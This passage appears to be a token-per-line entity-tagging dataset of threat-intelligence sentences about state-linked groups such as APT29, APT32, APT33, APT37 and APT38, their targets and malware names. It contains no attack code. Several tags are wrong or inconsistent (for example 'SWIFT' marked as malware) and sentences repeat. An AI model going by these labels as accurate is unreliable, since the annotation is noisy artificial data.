+Russian S-LOC +Federation O +. 
O + +This O +assertion O +of O +time O +zone O +is O +also O +supported O +by O +timestamps O +found O +in O +many O +GeminiDuke B-MAL +samples E-MAL +, O +which O +similarly O +suggest O +the O +group O +work O +in O +the O +Moscow O +Standard O +TIME O +timezone O +, O +as O +further O +detailed O +in O +the O +section O +on O +the O +technical O +analysis O +of O +GeminiDuke S-MAL +. O + +Mandiant S-SECTEAM +has O +observed O +Russian S-LOC +nation-state O +attackers S-APT +APT29 S-APT +employing O +domain O +fronting O +techniques O +for O +stealthy O +backdoor O +access O +to O +victim O +environments O +for O +at O +least O +two O +years O +. O + +APT29 S-APT +has O +used O +The B-MAL +Onion I-MAL +Router E-MAL +and O +the O +TOR B-MAL +domain I-MAL +fronting I-MAL +plugin I-MAL +meek E-MAL +to O +create O +a O +hidden O +, O +encrypted O +network O +tunnel O +that O +appeared O +to O +connect O +to O +Google S-IDTY +services O +over O +TLS O +. O + +Mandiant S-SECTEAM +has O +observed O +APT29 S-APT +using O +a O +stealthy O +backdoor O +that O +we O +call O +POSHSPY S-MAL +. O + +Mandiant S-SECTEAM +has O +since O +identified O +POSHSPY S-MAL +in O +several O +other O +environments O +compromised O +by O +APT29 S-APT +over O +the O +past O +two O +years O +. O + +In O +the O +investigations O +Mandiant S-SECTEAM +has O +conducted O +, O +it O +appeared O +that O +APT29 S-APT +deployed O +POSHSPY S-MAL +as O +a O +secondary O +backdoor O +for O +use O +if O +they O +lost O +access O +to O +their O +primary O +backdoors O +. O + +POSHSPY S-MAL +is O +an O +excellent O +example O +of O +the O +skill O +and O +craftiness O +of O +APT29 S-APT +. O + +FireEye S-SECTEAM +assesses O +that O +APT32 S-APT +leverages O +a O +unique O +suite O +of O +fully-featured O +malware O +, O +in O +conjunction O +with O +commercially-available O +tools O +, O +to O +conduct O +targeted O +operations O +that O +are O +aligned O +with O +Vietnamese S-LOC +state O +interests O +. 
O + +In O +addition O +to O +focused O +targeting O +of O +the O +private O +sector O +with O +ties O +to O +Vietnam S-LOC +, O +APT32 S-APT +has O +also O +targeted O +foreign O +governments S-IDTY +, O +as O +well O +as O +Vietnamese S-LOC +dissidents S-IDTY +and O +journalists S-IDTY +since O +at O +least O +2013 S-TIME +. O + +From O +2016 S-TIME +through O +2017 S-TIME +, O +two O +subsidiaries O +of O +U.S. S-LOC +and O +Philippine O +consumer B-IDTY +products I-IDTY +corporations E-IDTY +, O +located O +inside O +Vietnam S-LOC +, O +were O +the O +target O +of O +APT32 S-APT +intrusion O +operations O +. O + +From O +2016 S-TIME +through O +2017 S-TIME +, O +two O +consumer B-IDTY +products I-IDTY +corporations E-IDTY +, O +located O +inside O +Vietnam S-LOC +, O +were O +the O +target O +of O +APT32 S-APT +intrusion O +operations O +. O + +In O +2014 S-TIME +, O +APT32 S-APT +leveraged O +a O +spear-phishing S-ACT +attachment E-ACT +titled O +" O +Plans O +to O +crackdown O +on O +protesters O +at O +the O +Embassy O +of O +Vietnam.exe S-FILE +, O +" O +which O +targeted O +dissident O +activity O +among O +the O +Vietnamese S-LOC +diaspora S-IDTY +in O +Southeast B-LOC +Asia E-LOC +. O + +In O +2015 S-TIME +and O +2016 S-TIME +, O +two O +Vietnamese S-LOC +media S-IDTY +outlets O +were O +targeted O +with O +malware O +that O +FireEye S-SECTEAM +assesses O +to O +be O +unique O +to O +APT32 S-APT +. O + +In O +2014 S-TIME +, O +APT32 S-APT +leveraged O +a O +spear-phishing S-ACT +attachment E-ACT +titled O +" O +Plans O +to O +crackdown O +on O +protesters O +at O +the O +Embassy O +of O +Vietnam.exe S-FILE +" O +. O + +Since O +at O +least O +2014 S-TIME +, O +FireEye S-SECTEAM +has O +observed O +APT32 S-APT +targeting O +foreign B-IDTY +corporations E-IDTY +with O +a O +vested O +interest O +in O +Vietnam S-LOC +'s O +manufacturing S-IDTY +, O +consumer B-IDTY +products E-IDTY +, O +and O +hospitality B-IDTY +sectors E-IDTY +. 
O + +APT32 S-APT +operations O +are O +characterized O +through O +deployment O +of O +signature O +malware O +payloads O +including O +WINDSHIELD S-MAL +, O +KOMPROGO S-MAL +, O +SOUNDBITE S-MAL +, O +and O +PHOREAL S-MAL +. O + +In O +2017 S-TIME +, O +social B-IDTY +engineering E-IDTY +content O +in O +lures O +used O +by O +the O +actor S-APT +provided O +evidence O +that O +they O +were O +likely O +used O +to O +target O +members O +of O +the O +Vietnam S-LOC +diaspora S-IDTY +in O +Australia S-LOC +as O +well O +as O +government B-IDTY +employees E-IDTY +in O +the O +Philippines S-LOC +. O + +APT32 S-APT +often O +deploys O +these O +backdoors O +along O +with O +the O +commercially-available O +Cobalt B-MAL +Strike I-MAL +BEACON I-MAL +backdoor E-MAL +. O + +APT32 S-APT +often O +deploys O +these O +backdoors O +along O +with O +the O +commercially-available O +Cobalt B-MAL +Strike I-MAL +backdoor E-MAL +. O + +Based O +on O +incident O +response O +investigations O +, O +product O +detections O +, O +and O +intelligence O +observations O +along O +with O +additional O +publications O +on O +the O +same O +operators S-APT +, O +FireEye S-SECTEAM +assesses O +that O +APT32 S-APT +is O +a O +cyber B-ACT +espionage I-ACT +group O +aligned O +with O +Vietnamese S-LOC +government O +interests O +. O + +OceanLotus S-APT +, O +also O +known O +as O +APT32 S-APT +, O +is O +believed O +to O +be O +a O +Vietnam-based S-LOC +APT O +group O +that O +has O +become O +increasingly O +sophisticated O +in O +its O +attack O +tactics O +, O +techniques O +, O +and O +procedures O +( O +TTPs O +) O +. O + +While O +Volexity S-SECTEAM +does O +not O +typically O +engage O +in O +attempting O +attribution O +of O +any O +threat O +actor O +, O +Volexity S-SECTEAM +does O +agree O +with O +previously O +reported O +assessments O +that O +OceanLotus S-APT +is O +likely O +operating O +out O +of O +Vietnam S-LOC +. 
O + +During O +that O +phase O +, O +the O +APT32 S-APT +operated O +a O +fileless O +PowerShell-based O +infrastructure O +, O +using O +customized B-MAL +PowerShell E-MAL +payloads O +taken O +from O +known O +offensive O +frameworks O +such O +as O +Cobalt B-MAL +Strike E-MAL +, O +PowerSploit S-MAL +and O +Nishang S-MAL +. O + +However O +, O +over O +the O +past O +few O +years O +, O +we O +have O +been O +tracking O +a O +separate O +, O +less O +widely O +known O +suspected O +Iranian S-LOC +group O +with O +potential O +destructive O +capabilities O +, O +whom O +we O +call O +APT33 S-APT +. O + +Our O +analysis O +reveals O +that O +APT33 S-APT +is O +a O +capable O +group O +that O +has O +carried O +out O +cyber B-ACT +espionage I-ACT +operations E-ACT +since O +at O +least O +2013 S-TIME +. O + +We O +assess O +APT33 S-APT +works O +at O +the O +behest O +of O +the O +Iranian S-LOC +government O +. O + +APT33 S-APT +has O +targeted O +organizations O +– O +spanning B-IDTY +multiple I-IDTY +industries E-IDTY +– O +headquartered O +in O +the O +United B-LOC +States E-LOC +, O +Saudi B-LOC +Arabia E-LOC +and O +South B-LOC +Korea E-LOC +. O + +Cybereason S-SECTEAM +also O +attributes O +the O +recently O +reported O +Backdoor.Win32.Denis S-MAL +to O +the O +OceanLotus B-APT +Group E-APT +, O +which O +at O +the O +time O +of O +this O +report O +'s O +writing O +, O +had O +not O +been O +officially O +linked O +to O +this O +threat O +actor O +. O + +APT33 S-APT +has O +shown O +particular O +interest O +in O +organizations O +in O +the O +aviation B-IDTY +sector E-IDTY +, O +as O +well O +as O +organizations O +in O +the O +energy B-IDTY +sector E-IDTY +with O +ties O +to O +petrochemical S-IDTY +production O +. O + +From O +mid-2016 S-TIME +through O +early B-TIME +2017 E-TIME +, O +APT33 S-APT +compromised O +a O +U.S. 
S-LOC +organization S-IDTY +in O +the O +aerospace B-IDTY +sector E-IDTY +and O +targeted O +a O +business B-IDTY +conglomerate E-IDTY +located O +in O +Saudi B-LOC +Arabia E-LOC +with O +aviation O +holdings O +. O + +From O +mid-2016 S-TIME +through O +early B-TIME +2017 E-TIME +, O +APT33 S-APT +compromised O +organizations O +located O +in O +Saudi B-LOC +Arabia E-LOC +and O +U.S. S-LOC +in O +the O +aerospace B-IDTY +sector E-IDTY +. O + +During O +the O +same O +time O +period O +, O +APT33 S-APT +also O +targeted O +companies O +in O +South B-LOC +Korea E-LOC +involved O +in O +oil B-IDTY +refining E-IDTY +and O +petrochemicals S-IDTY +. O + +More O +recently O +, O +in O +May B-TIME +2017 E-TIME +, O +APT33 S-APT +appeared O +to O +target O +a O +Saudi S-LOC +organization S-IDTY +and O +a O +South B-LOC +Korean E-LOC +business B-IDTY +conglomerate E-IDTY +using O +a O +malicious B-FILE +file E-FILE +that O +attempted O +to O +entice O +victims O +with O +job O +vacancies O +for O +a O +Saudi B-LOC +Arabian E-LOC +petrochemical B-IDTY +company E-IDTY +. O + +More O +recently O +, O +in O +May B-TIME +2017 E-TIME +, O +APT33 S-APT +appeared O +to O +target O +organizations O +in O +Saudi S-LOC +and O +South B-LOC +Korea E-LOC +using O +a O +malicious B-FILE +file E-FILE +that O +attempted O +to O +entice O +victims O +with O +job O +vacancies O +. O + +We O +assess O +the O +targeting O +of O +multiple O +companies O +with O +aviation-related O +partnerships O +to O +Saudi B-LOC +Arabia E-LOC +indicates O +that O +APT33 S-APT +may O +possibly O +be O +looking O +to O +gain O +insights O +on O +Saudi B-LOC +Arabia E-LOC +'s O +military O +aviation O +capabilities O +to O +enhance O +Iran S-LOC +'s O +domestic O +aviation O +capabilities O +or O +to O +support O +Iran S-LOC +'s O +military S-IDTY +and O +strategic O +decision O +making O +vis O +a O +vis O +Saudi B-LOC +Arabia E-LOC +. 
O + +APT33 S-APT +may O +possibly O +be O +looking O +to O +gain O +insights O +on O +Saudi B-LOC +Arabia E-LOC +'s O +military O +aviation O +capabilities O +to O +enhance O +Iran S-LOC +'s O +domestic O +aviation O +capabilities O +or O +to O +support O +Iran S-LOC +'s O +military S-IDTY +and O +strategic O +decision O +making O +vis O +a O +vis O +Saudi B-LOC +Arabia E-LOC +. O + +The O +generalized O +targeting O +of O +organizations O +involved O +in O +energy S-IDTY +and O +petrochemicals S-IDTY +mirrors O +previously O +observed O +targeting O +by O +other O +suspected O +Iranian S-LOC +threat B-APT +groups E-APT +, O +indicating O +a O +common O +interest O +in O +the O +sectors O +across O +Iranian S-LOC +actors S-APT +. O + +APT33 S-APT +sent O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +employees S-IDTY +whose O +jobs O +related O +to O +the O +aviation B-IDTY +industry E-IDTY +. O + +APT33 S-APT +registered O +multiple O +domains O +that O +masquerade O +as O +Saudi B-LOC +Arabian E-LOC +aviation B-IDTY +companies E-IDTY +and O +Western S-LOC +organizations O +that O +together O +have O +partnerships O +to O +provide O +training O +, O +maintenance O +and O +support O +for O +Saudi S-LOC +'s O +military O +and O +commercial O +fleet O +. O + +We O +identified O +APT33 S-MAL +malware S-MAL +tied O +to O +an O +Iranian S-LOC +persona O +who O +may O +have O +been O +employed O +by O +the O +Iranian S-LOC +government O +to O +conduct O +cyber B-ACT +threat I-ACT +activity E-ACT +against O +its O +adversaries O +. O + +APT33 S-APT +'s O +targeting O +of O +organizations O +involved O +in O +aerospace S-IDTY +and O +energy S-IDTY +most O +closely O +aligns O +with O +nation-state O +interests O +, O +implying O +that O +the O +threat O +actor O +is O +most O +likely O +government O +sponsored O +. 
O + +APT33 S-APT +leverages O +popular O +Iranian S-LOC +hacker O +tools O +and O +DNS S-PROT +servers O +used O +by O +other O +suspected O +Iranian S-LOC +threat B-APT +groups E-APT +. O + +This O +coupled O +with O +the O +timing O +of O +operations O +– O +which O +coincides O +with O +Iranian S-LOC +working O +hours O +– O +and O +the O +use O +of O +multiple O +Iranian S-LOC +hacker O +tools O +and O +name B-MAL +servers E-MAL +bolsters O +our O +assessment O +that O +APT33 S-APT +may O +have O +operated O +on O +behalf O +of O +the O +Iranian S-LOC +government O +. O + +The O +publicly O +available O +backdoors O +and O +tools O +utilized O +by O +APT33 S-APT +– O +including O +NANOCORE S-MAL +, O +NETWIRE S-MAL +, O +and O +ALFA B-MAL +Shell E-MAL +– O +are O +all O +available O +on O +Iranian S-LOC +hacking O +websites O +, O +associated O +with O +Iranian S-LOC +hackers O +, O +and O +used O +by O +other O +suspected O +Iranian S-LOC +threat B-APT +groups E-APT +. O + +APT33 S-APT +'s O +focus O +on O +aviation S-IDTY +may O +indicate O +the O +group O +'s O +desire O +to O +gain O +insight O +into O +regional O +military S-IDTY +capabilities O +to O +enhance O +Iran S-LOC +'s O +aviation O +capabilities O +or O +to O +support O +Iran S-LOC +'s O +military S-IDTY +and O +strategic O +decision O +making O +. O + +Specifically O +, O +the O +targeting O +of O +organizations O +in O +the O +aerospace S-IDTY +and O +energy B-IDTY +sectors E-IDTY +indicates O +that O +the O +APT33 S-APT +is O +likely O +in O +search O +of O +strategic O +intelligence O +capable O +of O +benefitting O +a O +government S-IDTY +or O +military S-IDTY +sponsor O +. 
O + +APT33 S-APT +'s O +focus O +on O +aviation S-IDTY +may O +indicate O +the O +group O +'s O +desire O +to O +gain O +insight O +into O +regional O +military O +aviation O +capabilities O +to O +enhance O +Iran S-LOC +'s O +aviation S-IDTY +capabilities O +or O +to O +support O +Iran S-LOC +'s O +military S-IDTY +and O +strategic O +decision O +making O +. O + +We O +expect O +APT33 B-ACT +activity E-ACT +will O +continue O +to O +cover O +a O +broad O +scope O +of O +targeted O +entities O +, O +and O +may O +spread O +into O +other O +regions O +and O +sectors O +as O +Iranian S-LOC +interests O +dictate O +. O + +The O +Elfin S-APT +espionage S-ACT +group O +( O +aka O +APT33 S-APT +) O +has O +remained O +highly O +active O +over O +the O +past O +three O +years O +, O +attacking O +at O +least O +50 O +organizations O +in O +Saudi B-LOC +Arabia E-LOC +, O +the O +United B-LOC +States E-LOC +, O +and O +a O +range O +of O +other O +countries O +. O + +On O +May B-TIME +16 I-TIME +, I-TIME +2019 E-TIME +FireEye B-SECTEAM +'s I-SECTEAM +Advanced I-SECTEAM +Practices E-SECTEAM +team O +attributed O +the O +remaining O +" O +suspected O +APT33 B-ACT +activity E-ACT +" O +( O +referred O +to O +as O +GroupB O +in O +this O +blog O +post O +) O +to O +APT33 S-APT +, O +operating O +at O +the O +behest O +of O +the O +Iranian S-LOC +government O +. O + +The O +Elfin B-APT +group E-APT +( O +aka O +APT33 S-APT +) O +has O +remained O +highly O +active O +over O +the O +past O +three O +years O +, O +attacking O +at O +least O +50 O +organizations O +in O +Saudi B-LOC +Arabia E-LOC +, O +the O +United B-LOC +States E-LOC +, O +and O +a O +range O +of O +other O +countries O +. 
O + +On O +May B-TIME +16 I-TIME +, I-TIME +2019 E-TIME +FireEye B-SECTEAM +'s I-SECTEAM +Advanced I-SECTEAM +Practices E-SECTEAM +team O +attributed O +the O +remaining O +" O +suspected O +APT33 B-ACT +activity E-ACT +" O +to O +APT33 S-APT +, O +operating O +at O +the O +behest O +of O +the O +Iranian S-LOC +government O +. O + +APT37 S-APT +has O +likely O +been O +active O +since O +at O +least O +2012 S-TIME +and O +focuses O +on O +targeting O +the O +public O +and O +private O +sectors O +primarily O +in O +South B-LOC +Korea E-LOC +. O + +In O +2017 S-TIME +, O +APT37 S-APT +expanded O +its O +targeting O +beyond O +the O +Korean B-LOC +peninsula E-LOC +to O +include O +Japan S-LOC +, O +Vietnam S-LOC +and O +the O +Middle B-LOC +East E-LOC +, O +and O +to O +a O +wider O +range O +of O +industry O +verticals O +, O +including O +chemicals S-IDTY +, O +electronics S-IDTY +, O +manufacturing S-IDTY +, O +aerospace S-IDTY +, O +automotive S-IDTY +and O +healthcare B-IDTY +entities E-IDTY +. O + +In O +2017 S-TIME +, O +APT37 S-APT +targeted O +a O +company O +in O +Middle B-LOC +East E-LOC +that O +entered O +into O +a O +joint O +venture O +with O +the O +North B-LOC +Korean E-LOC +government O +to O +provide O +telecommunications B-IDTY +service E-IDTY +to O +the O +country O +. O + +While O +not O +conclusive O +by O +itself O +, O +the O +use O +of O +publicly O +available O +Iranian S-LOC +hacking O +tools O +and O +popular O +Iranian S-LOC +hosting B-IDTY +companies E-IDTY +may O +be O +a O +result O +of O +APT33 S-APT +'s O +familiarity O +with O +them O +and O +lends O +support O +to O +the O +assessment O +that O +APT33 S-APT +may O +be O +based O +in O +Iran S-LOC +. O + +North B-LOC +Korean E-LOC +defector O +and O +human O +rights-related O +targeting O +provides O +further O +evidence O +that O +APT37 S-APT +conducts O +operations O +aligned O +with O +the O +interests O +of O +North B-LOC +Korea E-LOC +. 
O + +In O +2017 S-TIME +, O +APT37 S-APT +targeted O +a O +Middle B-LOC +Eastern E-LOC +company S-IDTY +that O +entered O +into O +a O +joint O +venture O +with O +the O +North B-LOC +Korean E-LOC +government O +to O +provide O +telecommunications B-IDTY +service E-IDTY +to O +the O +country O +( O +read O +on O +for O +a O +case O +study O +) O +. O + +APT37 S-APT +targeted O +a O +research B-IDTY +fellow E-IDTY +, O +advisory B-IDTY +member E-IDTY +, O +and O +journalist S-IDTY +associated O +with O +different O +North B-LOC +Korean E-LOC +human O +rights O +issues O +and O +strategic B-IDTY +organizations E-IDTY +. O + +APT37 S-APT +distributed O +SLOWDRIFT S-MAL +malware S-MAL +using O +a O +lure O +referencing O +the O +Korea O +Global O +Forum O +against O +academic S-IDTY +and O +strategic B-IDTY +institutions E-IDTY +located O +in O +South B-LOC +Korea E-LOC +. O + +We O +believe O +a O +organization O +located O +in O +Middle B-LOC +East E-LOC +was O +targeted O +by O +APT37 S-APT +because O +it O +had O +been O +involved O +with O +a O +North B-LOC +Korean E-LOC +company S-IDTY +and O +a O +business O +deal O +went O +bad O +. O + +In O +one O +instance O +, O +APT37 S-APT +weaponized O +a O +video O +downloader O +application O +with O +KARAE S-MAL +malware S-MAL +that O +was O +indiscriminately O +distributed O +to O +South B-LOC +Korean E-LOC +victims O +through O +torrent O +websites O +. O + +FireEye S-SECTEAM +confirmed O +that O +since O +at O +least O +November B-TIME +2017 E-TIME +, O +APT37 S-APT +exploited O +a O +zero-day S-VULNAME +Adobe B-TOOL +Flash E-TOOL +vulnerability O +, O +CVE-2018-4878 S-VULID +, O +to O +distribute O +DOGCALL S-MAL +malware S-MAL +to O +South B-LOC +Korean E-LOC +victims O +. 
O + +FireEye B-SECTEAM +iSIGHT I-SECTEAM +Intelligence E-SECTEAM +confirmed O +that O +since O +at O +least O +November B-TIME +2017 E-TIME +, O +APT37 S-APT +exploited O +a O +zero-day S-VULNAME +Adobe B-TOOL +Flash E-TOOL +vulnerability O +, O +CVE-2018-4878 S-VULID +, O +to O +distribute O +DOGCALL S-MAL +malware S-MAL +to O +South B-LOC +Korean E-LOC +victims O +. O + +In O +April B-TIME +2017 E-TIME +, O +APT37 S-APT +targeted O +South B-LOC +Korean E-LOC +military S-IDTY +and O +government B-IDTY +organizations E-IDTY +with O +the O +DOGCALL B-MAL +backdoor E-MAL +and O +RUHAPPY B-MAL +wiper I-MAL +malware E-MAL +. O + +It O +is O +possible O +that O +APT37 S-APT +'s O +distribution O +of O +KARAE S-MAL +malware S-MAL +via O +torrent O +websites O +could O +assist O +in O +creating O +and O +maintaining O +botnets O +for O +future O +distributed B-ACT +denial-of-service E-ACT +( O +DDoS S-ACT +) O +attacks O +, O +or O +for O +other O +activity O +such O +as O +financially O +motivated O +campaigns S-ACT +or O +disruptive O +operations O +. O + +We O +assess O +with O +high O +confidence O +that O +APT37 S-APT +acts O +in O +support O +of O +the O +North B-LOC +Korean E-LOC +government O +and O +is O +primarily O +based O +in O +North B-LOC +Korea E-LOC +. O + +The O +compilation O +times O +of O +APT37 S-MAL +malware S-MAL +is O +consistent O +with O +a O +developer O +operating O +in O +the O +North B-LOC +Korea E-LOC +time O +zone O +( O +UTC O ++8:30 O +) O +and O +follows O +what O +is O +believed O +to O +be O +a O +typical O +North B-LOC +Korean E-LOC +workday O +. O + +The O +majority O +of O +APT37 B-ACT +activity E-ACT +continues O +to O +target O +South B-LOC +Korea E-LOC +, O +North B-LOC +Korean E-LOC +defectors S-IDTY +, O +and O +organizations O +and O +individuals O +involved O +in O +Korean B-LOC +Peninsula E-LOC +reunification O +efforts O +. 
O + +Similarly O +, O +APT37 S-APT +targeting O +of O +a O +company O +located O +in O +Middle B-LOC +East E-LOC +in O +2017 S-TIME +is O +also O +consistent O +with O +North B-LOC +Korean E-LOC +objectives O +given O +the O +entity O +'s O +extensive O +relationships O +inside O +North B-LOC +Korea E-LOC +. O + +Similarly O +, O +APT37 S-APT +targeting O +of O +a O +Middle B-LOC +Eastern E-LOC +company S-IDTY +in O +2017 S-TIME +is O +also O +consistent O +with O +North B-LOC +Korean E-LOC +objectives O +given O +the O +entity O +'s O +extensive O +relationships O +inside O +North B-LOC +Korea E-LOC +. O + +In O +May B-TIME +2017 E-TIME +, O +APT37 S-APT +used O +a O +bank O +liquidation O +letter O +as O +a O +spear B-ACT +phishing I-ACT +lure E-ACT +against O +a O +board B-IDTY +member E-IDTY +of O +a O +Middle B-LOC +Eastern E-LOC +financial B-IDTY +company E-IDTY +. O + +Though O +they O +have O +primarily O +tapped O +other O +tracked O +suspected O +North B-LOC +Korean E-LOC +teams O +to O +carry O +out O +the O +most O +aggressive O +actions O +, O +APT37 S-APT +is O +an O +additional O +tool O +available O +to O +the O +regime O +, O +perhaps O +even O +desirable O +for O +its O +relative O +obscurity O +. O + +ScarCruft S-APT +is O +a O +relatively O +new O +APT O +group O +, O +victims O +have O +been O +observed O +in O +Russia S-LOC +, O +Nepal S-LOC +, O +South B-LOC +Korea E-LOC +, O +China S-LOC +, O +India S-LOC +, O +Kuwait S-LOC +and O +Romania S-LOC +. O + +Certain O +details O +, O +such O +as O +using O +the O +same O +infrastructure O +and O +targeting O +, O +make O +us O +believe O +that O +Operation B-ACT +Daybreak E-ACT +is O +being O +done O +by O +the O +ScarCruft S-APT +APT O +group O +. O + +Prior O +to O +the O +discovery O +of O +Operation B-ACT +Daybreak E-ACT +, O +we O +observed O +the O +ScarCruft B-APT +APT E-APT +launching O +a O +series O +of O +attacks O +in O +Operation B-ACT +Erebus E-ACT +. 
O + +Operation B-ACT +Daybreak E-ACT +appears O +to O +have O +been O +launched O +by O +unknown O +attackers S-APT +to O +infect O +high O +profile O +targets O +through O +spear-phishing S-ACT +e-mails E-ACT +. O + +Operation B-ACT +Daybreak E-ACT +appears O +to O +have O +been O +launched O +by O +APT37 S-APT +to O +infect O +high O +profile O +targets O +through O +spear-phishing S-ACT +e-mails E-ACT +. O + +On O +occasion O +the O +APT37 S-APT +directly O +included O +the O +ROKRAT S-MAL +payload O +in O +the O +malicious O +document O +and O +during O +other O +campaigns S-ACT +the O +attackers S-APT +leveraged O +multi-stage O +infection O +processes O +. O + +In O +the O +early B-TIME +part I-TIME +of I-TIME +2017 E-TIME +, O +Group123 S-APT +started O +the O +" O +Evil B-ACT +New I-ACT +Year E-ACT +" O +campaign O +. O + +In O +November B-TIME +2017 E-TIME +, O +Talos S-SECTEAM +observed O +the O +latest O +Group123 B-ACT +campaign E-ACT +of O +the O +year O +, O +which O +included O +a O +new O +version O +of O +ROKRAT S-MAL +being O +used O +in O +the O +latest O +wave O +of O +attacks O +. O + +Group123 S-APT +is O +constantly O +evolving O +as O +the O +new O +fileless O +capability O +that O +was O +added O +to O +ROKRAT S-MAL +demonstrates O +. O + +In O +this O +campaign O +, O +the O +Group123 S-APT +used O +a O +classical O +HWP B-MAL +document E-MAL +in O +order O +to O +download O +and O +execute O +a O +previously O +unknown O +malware O +: O +NavRAT S-MAL +. O + +However O +, O +we O +asses O +with O +medium O +confidence O +that O +NavRAT S-MAL +is O +linked O +to O +Group123 S-APT +. O + +APT38 S-APT +is O +a O +financially O +motivated O +North B-LOC +Korean E-LOC +regime-backed O +group O +responsible O +for O +conducting O +destructive B-ACT +attacks E-ACT +against O +financial B-IDTY +institutions E-IDTY +, O +as O +well O +as O +some O +of O +the O +world O +'s O +largest O +cyber B-APT +heists E-APT +. 
O + +APT38 S-APT +is O +a O +financially O +motivated O +North B-LOC +Korean E-LOC +regime-backed O +group O +responsible O +for O +conducting O +destructive B-ACT +attacks E-ACT +against O +financial B-IDTY +institutions E-IDTY +, O +as O +well O +as O +some O +of O +the O +world O +. O + +APT38 S-APT +is O +believed O +to O +operate O +more O +similarly O +to O +an O +espionage O +operation O +, O +carefully O +conducting O +reconnaissance O +within O +compromised O +financial B-IDTY +institutions E-IDTY +and O +balancing O +financially O +motivated O +objectives O +with O +learning O +about O +internal O +systems O +. O + +The O +group O +has O +compromised O +more O +than O +16 O +organizations O +in O +at O +least O +13 O +different O +countries O +, O +sometimes O +simultaneously O +, O +since O +at O +least O +2014 S-TIME +. O + +APT38 S-APT +shares O +malware O +code O +and O +other O +development O +resources O +with O +TEMP.Hermit S-APT +North B-LOC +Korean E-LOC +cyber B-ACT +espionage I-ACT +activity E-ACT +, O +although O +we O +consider O +APT38 S-APT +. O + +We O +consider O +APT38 S-APT +'s O +operations O +more O +global O +and O +highly O +specialized O +for O +targeting O +the O +financial B-IDTY +sector E-IDTY +. O + +APT38 S-APT +is O +a O +financially O +motivated O +group O +linked O +to O +North B-LOC +Korean E-LOC +cyber B-APT +espionage I-APT +operators E-APT +, O +renown O +for O +attempting O +to O +steal O +hundreds O +of O +millions O +of O +dollars O +from O +financial B-IDTY +institutions E-IDTY +and O +their O +brazen O +use O +of O +destructive O +malware O +. O + +Because O +APT38 S-APT +is O +backed O +by O +( O +and O +acts O +on O +behalf O +of O +) O +the O +North B-LOC +Korean E-LOC +regime O +, O +we O +opted O +to O +categorize O +the O +group O +as O +an O +" O +APT O +" O +instead O +of O +a O +" O +FIN O +" O +. 
O + +Over O +time O +these O +malware O +similarities O +diverged O +, O +as O +did O +targeting O +, O +intended O +outcomes O +, O +and O +TTPs O +, O +almost O +certainly O +indicating O +that O +TEMP.Hermit B-ACT +activity E-ACT +is O +made O +up O +of O +multiple O +operational B-APT +groups E-APT +primarily O +linked O +together O +with O +shared O +malware O +development O +resources O +and O +North B-LOC +Korean E-LOC +state O +sponsorship O +. O + +Based O +on O +observed O +activity O +, O +we O +judge O +that O +APT38 S-APT +'s O +primary O +mission O +is O +targeting O +financial B-IDTY +institutions E-IDTY +and O +manipulating O +inter-bank O +financial O +systems O +to O +raise O +large O +sums O +of O +money O +for O +the O +North B-LOC +Korean E-LOC +regime O +. O + +Since O +2015 S-TIME +, O +APT38 S-APT +has O +attempted O +to O +steal O +hundreds O +of O +millions O +of O +dollars O +from O +financial B-IDTY +institutions E-IDTY +. O + +APT38 S-APT +has O +pursued O +their O +main O +objective O +of O +targeting O +banks S-IDTY +and O +financial B-IDTY +entities E-IDTY +since O +at O +least O +2014 S-TIME +. O + +We O +surmise O +that O +the O +targeting O +of O +banks S-IDTY +, O +media S-IDTY +, O +and O +government B-IDTY +agencies E-IDTY +is O +conducted O +in O +support O +of O +APT38 S-APT +'s O +primary O +mission O +. O + +The O +APT38 S-APT +targeted O +news B-IDTY +outlets E-IDTY +known O +for O +their O +business O +and O +financial B-IDTY +sector E-IDTY +reporting O +, O +probably O +in O +support O +of O +efforts O +to O +identify O +and O +compromise O +additional O +financial B-IDTY +institutions E-IDTY +. O + +APT38 S-APT +also O +targeted O +financial B-IDTY +transaction I-IDTY +exchange I-IDTY +companies E-IDTY +likely O +because O +of O +their O +proximity O +to O +banks S-IDTY +. 
O + +Given O +the O +lapse O +in O +time O +between O +the O +spear-phishing S-ACT +and O +the O +heist B-ACT +activity E-ACT +in O +the O +above O +example O +, O +we O +suggest O +two O +separate O +but O +related O +groups S-APT +under O +the O +North B-LOC +Korean E-LOC +regime O +were O +responsible O +for O +carrying O +out O +missions O +; O +one O +associated O +with O +reconnaissance O +( O +TEMP.Hermit S-APT +or O +a O +related O +group O +) O +and O +another O +for O +the O +heists O +( O +APT38 S-APT +) O +. O + +APT38 S-APT +, O +in O +particular O +, O +is O +strongly O +distinguishable O +because O +of O +its O +specific O +focus O +on O +financial B-IDTY +institutions E-IDTY +and O +operations O +that O +attempt O +to O +use O +SWIFT S-MAL +fraud O +to O +steal O +millions O +of O +dollars O +at O +a O +time O +. O + +We O +can O +confirm O +that O +the O +APT38 B-ACT +operator I-ACT +activity E-ACT +is O +linked O +to O +the O +North B-LOC +Korean E-LOC +regime O +, O +but O +maintains O +a O +set O +of O +common O +characteristics O +, O +including O +motivation O +, O +malware O +, O +targeting O +, O +and O +TTPs O +that O +set O +it O +apart O +from O +other O +statesponsored O +operations O +. O + +As O +previously O +mentioned O +, O +we O +assess O +with O +high O +confidence O +that O +APT38 S-APT +'s O +mission O +is O +focused O +on O +targeting O +financial B-IDTY +institutions E-IDTY +to O +raise O +money O +for O +the O +North B-LOC +Korean E-LOC +regime O +. O + +As O +previously O +mentioned O +, O +we O +assess O +with O +high O +confidence O +that O +APT38 S-APT +'s O +mission O +is O +focused O +on O +targeting O +financial B-IDTY +institutions E-IDTY +and O +financial O +systems O +to O +raise O +money O +for O +the O +North B-LOC +Korean E-LOC +regime O +. 
O + +Although O +the O +APT38 S-APT +'s O +primary O +targets O +appear O +to O +be O +Financial B-IDTY +Exchange I-IDTY +banks E-IDTY +and O +other O +financial B-IDTY +organizations E-IDTY +, O +they O +have O +also O +Financial O +Exchange O +targeted O +countries O +' O +media B-IDTY +organizations E-IDTY +with O +a O +focus O +on O +the O +financial B-IDTY +sector E-IDTY +. O + +Since O +at O +least O +the O +beginning B-TIME +of I-TIME +2014 E-TIME +, O +APT38 S-APT +operations O +have O +focused O +almost O +exclusively O +on O +developing O +and O +conducting O +financially O +motivated O +campaigns S-ACT +targeting O +international B-IDTY +entities E-IDTY +, O +whereas O +TEMP.Hermit S-APT +is O +generally O +linked O +to O +operations O +focused O +on O +South B-LOC +Korea E-LOC +and O +the O +United B-LOC +States E-LOC +. O + +TEMP.Hermit S-APT +is O +generally O +linked O +to O +operations O +focused O +on O +South B-LOC +Korea E-LOC +and O +the O 